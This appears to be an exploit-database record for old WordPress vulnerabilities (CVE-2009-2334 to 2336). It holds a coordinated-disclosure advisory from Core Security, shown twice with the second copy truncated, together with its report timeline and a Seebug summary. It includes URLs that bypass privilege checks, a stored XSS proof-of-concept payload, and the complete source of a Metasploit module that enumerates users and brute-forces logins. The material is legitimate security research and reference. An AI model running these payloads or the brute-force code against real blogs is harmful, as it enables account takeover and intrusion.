that can be leveraged by an attacker using the unchecked \nprivileges described in this advisory to inject persistent JavaScript \ncode. Possibly, arbitrary native code can be executed by the attacker if \nthe blog administrator, when he/she logs in, runs injected JavasScript \ncode that edits blog PHP code. The original URL for reconfiguring the \nplugin can be accessed only by the Administrator role. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php \n- -----------/ \n \nBut replacing the PHP file with the generic 'admin.php' any blog user \ncan modify this configuration. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php \n- -----------/ \n \nThe following JavaScript injection can be entered within field *Exclude \nactions by term* to exemplify this kind of abuse. When the administrator \nenters the same page the injected browser code will be executed and \npossibly blog PHP can be modified to run arbitrary native code. \n \n/----------- \n \n\\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=\" \n \n- -----------/ \n \nThis is the worst scenario that we found for the vulnerability. \n \n \n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard* \n \nIf installed, the WordPress Security Scanner Plugin dashboard can be \nviewed similarly by any user besides the administrator using the plugin \nconfiguration page URL without modification. This dashboard includes \ncommon default blog configuration settings that are insecure and should \nbe modified by the blog administrator or hosting. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php \n- -----------/ \n \n \n \n \n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project* \n \nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be \nreconfigured accessed with the same vulnerability. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php \n- -----------/ \n \nThis gives an attacker the possibility to disable many features of the \nplugin, for example reactivate the forgotten password feature and \nreactivate the XML-RPC blog interface. Also you can deny the weblog \nservice by configuring this plugin to be overly sensitive, blocking any \nrequest. However the plugin cannot be totally disabled because the \nessential IDS parameters 'Maximum impact to ignore bad requests' and \n'Minimum impact to sanitize bad requests' are verified on the server \nside of the blog and cannot be distorted to deactivate the sanitizing or \nblocking features of the web IDS plugin. \n \n \n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID \n35584)* \n \nWordPress discriminates bad password from bad user logins, this reduces \nthe complexity of a brute force attack on WordPress blogs login \n(CVE-2009-2335, BID 35584). The same user information disclosure happens \nwhen users use the forgotten mail interface to request a new password \n(CVE-2009-2336, same BID 35584). These information disclosures seem to \nbe previously reported [6] but the WordPress team is refusing to modify \nthem alleging *user convenience*. \n \nDefault installation of WordPress 2.7.1 leaks the name of the user \nposting entries inside the HTML of the blog. \n \n/----------- \n \n<small>June 3rd, 2009 <!-- by leakedusername --></small> \n- -----------/ \n \n \n \nAlso several administrative modules give to anyone the complete path \nwhere the web application is hosted inside the server. This may simplify \nor enable other malicious attacks. An example follows. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-settings.php \n- -----------/ \n \n \n \n/----------- \n \nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in \n[WP_LEAKED_PATH]\\wp-settings.php on line 110 \nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in \n[WP_LEAKED_PATH]\\wp-settings.php on line 112 \nWarning: require(ABSPATHwp-includes/compat.php) [function.require]: \nfailed to open stream: \nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246 \nFatal error: require() [function.require]: Failed opening required \n'ABSPATHwp-includes/compat.php' \n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in \n[WP_LEAKED_PATH]\\wp-settings.php on line 246 \n \n- -----------/ \n \n \n \n \n9. *Report Timeline* \n \n. 2009-06-04: \nCore Security Technologies notifies the WordPress team of the \nvulnerabilities (security@wordpress.org) and offers a technical \ndescription encrypted or in plain-text. Advisory is planned for \npublication on June 22th. \n \n. 2009-06-08: \nCore notifies again the WordPress team of the vulnerability. \n \n. 2009-06-10: \nThe WordPress team asks Core for a technical description of the \nvulnerability in plain-text. \n \n. 2009-06-11: \nTechnical details sent to WordPress team by Core. \n \n. 2009-06-11: \nWordPress team notifies Core that a fix was produced and is available to \nCore for testing. WordPress team asserts that password and username \ndiscrimination as well as username leakage are known and will not be \nfixed because they are convenient for the users. \n \n. 2009-06-12: \nCore tells the WordPress team that the patch will be tested by Core as a \ncourtesy as soon as possible. It also requests confirmation that \nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to \nthe flaws included in the advisory draft CORE-2009-0515. \n \n. 2009-06-12: \nWordPress team confirms that WordPress 2.8 and earlier plus \nWordPress.com are vulnerable to the flaws included in the advisory draft. \n \n. 2009-06-17: \nCore informs the WordPress team that the patch is only fixing one of the \nfour proof of concept abuses included in the advisory draft. Core \nreminds the WordPress team that the advisory is scheduled to be \npublished on June 22th but a new schedule can be discussed. \n \n. 2009-06-19: \nCore asks for a new patched version of WordPress, if available, and \nnotifies the WordPress team that the publication of the advisory was \nre-scheduled to June 30th. \n \n. 2009-06-19: \nWordPress team confirms they have a new patch that has the potential to \nbreak a lot of plugins. \n \n. 2009-06-29: \nWordPress team asks for a delayance on advisory CORE-2009-0515 \npublication until July 6th, when WordPress MU version will be patched. \n \n. 2009-06-29: \nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th. \n \n. 2009-06-29: \nCore tells the WordPress team that other administrative PHP modules can \nalso be rendered by non-administrative users, such as module \n'admin-post.php' and 'link-parse-opml.php'. \n \n. 2009-07-02: \nWordPress team comments that 'admin.php' and 'admin-post.php' are \nintentionally open and plugins can choose to hook either privileged or \nunprivileged actions. They also comment that unprivileged access to \n'link-parse-opml.php' is benign but having this file open is bad form. \n \n. 2009-07-02: \nCore sends the WordPress team a new draft of the advisory and comments \nthat there is no capability specified in Worpress documentation for \nconfiguring plugins. Also control of actions registered by plugins is \nnot enforced. Core also notices that the privileges unchecked bug in \n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development \nrelease. \n \n. 2009-07-06: \nCore requests WordPress confirmation of the release date of WordPress \n2.8.1 and WordPress MU 2.8. \n \n. 2009-07-07: \nWordPress team confirms that a release candidate of WordPress 2.8.1 is \nmade available to users and that the advisory may be published. \n \n. 2009-07-06: \nCore requests WordPress confirmation of the release date of WordPress MU \nand WordPress MU new version numbers. \n \n. 2009-07-07: \nWordPress team release WordPress 2.8.1 RC1 to its users. \n \n. 2009-07-08: \nWordPress team confirms that WordPress MU 2.8.1 will be made available \nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th. \n \n. 2009-07-08: \nThe advisory CORE-2009-0515 is published. \n \n \n \n10. *References* \n \n[1] WordPress vulnerabilities in CVE database \nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress \n[2] SecuriTeam List of WordPress Vulnerabilities \nhttp://www.securiteam.com/products/W/Wordpress.html \n[3] WordPress Vulnerability - YBO Interactive Blog \nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/ \n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1 \nhttp://wordpress.org/support/topic/280748 \n[5] Security breach - xkcd blog \nhttp://blag.xkcd.com/2009/06/18/security-breach/ \n[6] securityvulns.com WordPress vulnerabilities digest in English \nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded \n[7] CVE-2008-0196 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196 \n[8] WordPress Roles and Capabilities \nhttp://codex.wordpress.org/Roles_and_Capabilities \n[9] WordPress Download Counter \nhttp://wordpress.org/download/counter/ \n[10] WordPress Intrusion Detection System Plugin \nhttp://php-ids.org/2008/02/21/wpids-version-012-released/ \n[11] Hardening WordPress with htaccess \nhttp://blogsecurity.net/wordpress/article-210607 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2009 Core Security \nTechnologies and (c) 2009 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (MingW32) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N \nTPRpR0Gn0WqmF8HOeDslbA8= \n=zEDK \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/79033/CORE-2009-0515.txt"}], "metasploit": [{"lastseen": "2019-11-28T12:02:12", "description": "WordPress Authentication Brute Force and User Enumeration Utility\n", "published": "2013-08-21T10:45:15", "type": "metasploit", "title": "WordPress Brute Force and User Enumeration Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335"], "modified": "2018-06-14T18:28:03", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_LOGIN_ENUM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n\n def initialize\n super(\n 'Name' => 'WordPress Brute Force and User Enumeration Utility',\n 'Description' => 'WordPress Authentication Brute Force and User Enumeration Utility',\n 'Author' =>\n [\n 'Tiago Ferreira <tiago.ccna[at]gmail.com>',\n 'Zach Grace <zgrace[at]404labs.com>',\n 'Christian Mehlmauer'\n ],\n 'References' =>\n [\n ['BID', '35581'],\n ['CVE', '2009-2335'],\n ['OSVDB', '55713']\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptBool.new('VALIDATE_USERS', [ true, 'Validate usernames', true ]),\n OptBool.new('BRUTEFORCE', [ true, 'Perform brute force authentication', true ]),\n OptBool.new('ENUMERATE_USERNAMES', [ true, 'Enumerate usernames', true ]),\n OptInt.new('RANGE_START', [false, 'First user id to enumerate', 1]),\n OptInt.new('RANGE_END', [false, 'Last user id to enumerate', 10])\n ])\n\n end\n\n def run_host(ip)\n\n unless wordpress_and_online?\n print_error(\"#{target_uri} does not seem to be WordPress site\")\n return\n end\n\n version = wordpress_version\n print_status(\"#{target_uri} - WordPress Version #{version} detected\") if version\n\n usernames = []\n if datastore['ENUMERATE_USERNAMES']\n vprint_status(\"#{target_uri} - WordPress User-Enumeration - Running User Enumeration\")\n usernames = enum_usernames\n end\n\n if datastore['VALIDATE_USERS']\n @users_found = {}\n vprint_status(\"#{target_uri} - WordPress User-Validation - Running User Validation\")\n each_user_pass { |user, pass|\n validate_user(user)\n }\n\n unless @users_found.empty?\n print_good(\"#{target_uri} - WordPress User-Validation - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\n end\n end\n\n if datastore['BRUTEFORCE']\n vprint_status(\"#{target_uri} - WordPress Brute Force - Running Bruteforce\")\n if datastore['VALIDATE_USERS']\n if @users_found && @users_found.keys.size > 0\n vprint_status(\"#{target_uri} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\n end\n end\n\n # Brute-force using files.\n each_user_pass { |user, pass|\n if datastore['VALIDATE_USERS']\n next unless @users_found[user]\n end\n\n do_login(user, pass)\n }\n\n # Brute force previously found users\n if not usernames.empty?\n print_status(\"#{target_uri} - Brute-forcing previously found accounts...\")\n passwords = load_password_vars\n usernames.each do |user|\n passwords.each do |pass|\n do_login(user, pass)\n end\n end\n end\n\n end\n end\n\n def validate_user(user=nil)\n print_status(\"#{target_uri} - WordPress User-Validation - Checking Username:'#{user}'\")\n\n exists = wordpress_user_exists?(user)\n if exists\n print_good(\"#{target_uri} - WordPress User-Validation - Username: '#{user}' - is VALID\")\n connection_details = {\n module_fullname: self.fullname,\n username: user,\n workspace_id: myworkspace_id,\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n\n framework.db.create_credential_and_login(connection_details)\n @users_found[user] = :reported\n return :next_user\n else\n vprint_error(\"#{target_uri} - WordPress User-Validation - Invalid Username: '#{user}'\")\n return :skip_user\n end\n end\n\n\n def do_login(user=nil, pass=nil)\n vprint_status(\"#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\")\n\n cookie = wordpress_login(user, pass)\n\n if cookie\n print_good(\"#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\")\n\n store_valid_credential(user: user, private: pass, proof: cookie)\n\n return :next_user\n else\n vprint_error(\"#{target_uri} - WordPress Brute Force - Failed to login as '#{user}'\")\n return\n end\n end\n\n def enum_usernames\n usernames = []\n for i in datastore['RANGE_START']..datastore['RANGE_END']\n username = wordpress_userid_exists?(i)\n if username\n print_good \"#{target_uri} - Found user '#{username}' with id #{i.to_s}\"\n usernames << username\n end\n end\n\n if not usernames.empty?\n p = store_loot('wordpress.users', 'text/plain', rhost, usernames * \"\\n\", \"#{rhost}_wordpress_users.txt\")\n print_good(\"#{target_uri} - Usernames stored in: #{p}\")\n end\n\n return usernames\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_login_enum.rb"}], "seebug": [{"lastseen": "2017-11-19T18:43:57", "description": "BUGTRAQ ID: 35581\r\nCVE(CAN) ID: CVE-2009-2335,CVE-2009-2336\r\n\r\nWordPress\u662f\u4e00\u6b3e\u514d\u8d39\u7684\u8bba\u575bBlog\u7cfb\u7edf\u3002\r\n\r\nWordPress\u5bf9\u4e8e\u4f7f\u7528\u5df2\u6709\u7684\u7528\u6237\u540d\u548c\u4e0d\u5b58\u5728\u7528\u6237\u540d\u7684\u767b\u5f55\u5c1d\u8bd5\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u7ed3\u679c\uff0c\u8fd9\u964d\u4f4e\u4e86\u66b4\u529b\u731c\u6d4b\u653b\u51fb\u7684\u590d\u6742\u6027\uff1b\u6b64\u5916\u5728\u4f7f\u7528\u53e3\u4ee4\u91cd\u7f6e\u754c\u9762\u8bf7\u6c42\u65b0\u53e3\u4ee4\u7684\u65f6\u5019\uff0c\u5bf9\u4e8e\u5df2\u6709\u7684\u548c\u4e0d\u5b58\u5728\u7684\u7528\u6237\u540d\u4e5f\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u7ed3\u679c\u3002\n\nWordPress WordPress 2.6.5\r\nWordPress WordPress MU 2.7.1\n\r\nWordPress\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://wordpress.org/", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "WordPress\u53e3\u4ee4\u91cd\u7f6e\u7528\u6237\u540d\u679a\u4e3e\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11787", "id": "SSV:11787", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:44:22", "description": "No description provided by source.", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "WordPress Privileges Unchecked in admin.php and Multiple Information", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14855", "id": "SSV:14855", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\r\nDate published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and Jos\u00c3\u00a9 Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and 